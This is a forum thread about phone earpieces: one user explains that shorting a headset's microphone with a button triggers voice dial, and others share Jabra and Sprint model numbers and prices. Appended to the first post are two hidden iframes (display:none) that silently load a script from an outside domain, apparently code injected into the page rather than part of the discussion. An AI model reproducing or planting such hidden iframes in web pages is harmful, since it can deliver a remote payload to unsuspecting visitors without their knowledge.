+ Reply to Thread

earpeice answer....

I was looking at my bosses earpeice today. Its a samsung earpeice with a button on the microphone. It seems that I could initiate voicedial calls by pushing the button, and end the call by pushing the button again. I took it apart and looked at the cord, and apparently its just shorting out the microphone. So I took one of the ones that sprint sent me for free a couple months ago and shorted out the microphone. It worked great! I will go and but a jabar earpeice tomorrow with a button and see if I can get it to work the same way. I have not found any that do work natively, but this will be a good time to make one!
    Also answers why the voicedial would come on when removing regular earpeices....... Just my observations...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Jabra w/button

Jabra makes an earbud model specifically for Samsungs, with that same button on it. I got mine from Amazon.com for $9.99.

-Doug

Administrator

Arrow

sprint has a good ear piece for this phone.. it comes in a retarctable model . the wire retarcts back into the case. pretty nice!

marctronixx: do you know the model # for the sprint headphone? when i mentioned it at two sprint stores, all i got were blank stares, just like the time when i asked them if the i300 model was ever going to be available. does anyone even know if the 300 is available at sprint stores?

also, just in case, whats the model # for the jabra with the button, and does the button also initiate voice dial?

has anyone used the body glove headphone set? is it too bulky?

Administrator

Arrow

i am not at home so when i do i wil galdly give you the sku and everything else you wold need.. i have seen a couple here at my local sprint store.. in a little different cases...

Sprint earpiece

Sprint # SPFUHS002 $9.99 in any Sprint Store

Originally posted by davy
    marctronixx: do you know the model # for the sprint headphone? when i mentioned it at two sprint stores, all i got were blank stares, just like the time when i asked them if the i300 model was ever going to be available. does anyone even know if the 300 is available at sprint stores?

also, just in case, whats the model # for the jabra with the button, and does the button also initiate voice dial?

has anyone used the body glove headphone set? is it too bulky?
    :o